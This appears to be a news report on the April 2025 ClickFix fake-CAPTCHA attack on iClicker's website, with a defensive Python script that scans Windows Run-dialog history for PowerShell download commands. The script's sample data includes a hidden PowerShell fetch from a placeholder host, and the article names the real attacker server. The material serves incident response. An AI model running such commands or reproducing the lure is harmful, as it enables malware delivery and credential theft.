iClicker Site Breach Delivered Malware Through Fake CAPTCHA Attack
The official iClicker website was compromised in mid-April 2025 by a ClickFix attack that leveraged a deceptive CAPTCHA prompt to infect users with malware. The breach specifically impacted users between April 12 and April 16 and targeted college students and instructors across the U.S.
iClicker is a classroom engagement tool widely used in universities like the University of Michigan, University of Florida, and other major institutions, with over 7 million student users and 5,000 instructors.
How the ClickFix Attack Worked
According to a University of Michigan Safe Computing alert, the attack introduced a fake CAPTCHA prompt on the iClicker landing page. When users clicked “I’m not a robot,” the following actions occurred:
- A malicious PowerShell script was silently copied to the Windows clipboard.
- The CAPTCHA then instructed users to:
  - Press Win + R to open the Run dialog.
  - Paste the script (Ctrl + V).
  - Press Enter to execute the script.
This technique, known as a ClickFix social engineering attack, manipulates users into running malware manually under the guise of routine verification.
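Because the lure depends on the victim pasting a command into the Run dialog, responders can look for it afterwards: Windows keeps Run-dialog history per user under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following triage sketch is an added example, not code from the University of Michigan alert or from iClicker; the regexes, the three-trait threshold and the sample values (including the documentation address 192.0.2.10) are constructed assumptions.

```python
import re

# Heuristic traits of a ClickFix-style Run-dialog entry (assumed, not exhaustive).
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "web_fetch": re.compile(r"\b(iwr|irm|curl|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?", re.I),
    "lure_comment": re.compile(r"#.*(robot|captcha|verif)", re.I),
}

# Constructed sample of RunMRU values; real entries also end in "\1".
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": 'powershell -WindowStyle Hidden -c "iwr http://192.0.2.10:8080/example" # I am not a robot\\1',
    "c": "\\\\fileserver\\share\\1",
    "d": "notepad C:\\Users\\student\\notes.txt\\1",
    "e": "powershell -File C:\\Scripts\\backup.ps1\\1",
    "MRUList": "bedca",
}

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, with the "\\1" suffix removed."""
    cmds = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def score(cmd):
    """Return the sorted names of the indicators that match one command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))

def triage(values, min_traits=3):
    """Flag entries that start a script host and show at least min_traits traits in total."""
    findings = []
    for cmd in parse_runmru(values):
        traits = score(cmd)
        if "script_host" in traits and len(traits) >= min_traits:
            findings.append((cmd, traits))
    return findings

if __name__ == "__main__":
    for cmd, traits in triage(SAMPLE_RUNMRU):
        print("SUSPICIOUS:", cmd, "->", ", ".join(traits))
```

On a live Windows host the same dictionary can be filled from the RunMRU key with Python's winreg module; an empty result does not clear a device, since the history can be deleted.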
Malicious Payload Details and Malware Behavior
The PowerShell payload was heavily obfuscated and connected to a remote server at http://67.217.228[.]14:8080. Based on the device type, it delivered different payloads:
- Targeted victims received malware that granted attackers full device access.
- Non-targets (e.g., sandboxes or researchers) were sent a legitimate Microsoft Visual C++ Redistributable installer to avoid detection.
Although the exact malware type varies, security analysts suggest it likely included infostealers, known for collecting:
- Browser data (cookies, passwords, credentials)
- Financial details (credit card info, cryptocurrency wallets, private keys)
- Text files and sensitive documents (e.g., seed.txt, wallet.txt, *.pdf)
Stolen data is typically archived and exfiltrated for resale or to fuel broader ransomware campaigns.
Response from iClicker and Macmillan
Though Macmillan, iClicker’s parent company, did not respond to media inquiries, iClicker published a security bulletin on May 6 stating:
“We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted…”
The notice confirmed the attacker placed a false CAPTCHA before users logged in. However, the bulletin was tagged with <meta name='robots' content='noindex, nofollow' />, preventing search engines from indexing it and making it harder for users to find.
“Out of an abundance of caution, we recommend that any faculty or student who encountered and clicked on the false Captcha from April 12–April 16 on our website run security software to ensure their devices remain protected.”
Action Required for Affected Users
The following steps are recommended for anyone who interacted with the fake CAPTCHA:
- Immediately change the iClicker password.
- Change all saved passwords on the affected device.
- Run trusted antivirus or security tools.
- Use a password manager (e.g., BitWarden or 1Password) to store unique passwords.
Only users who visited the iClicker website and followed the CAPTCHA prompts are affected. Users of the iClicker mobile app or those who did not encounter the CAPTCHA are not at risk.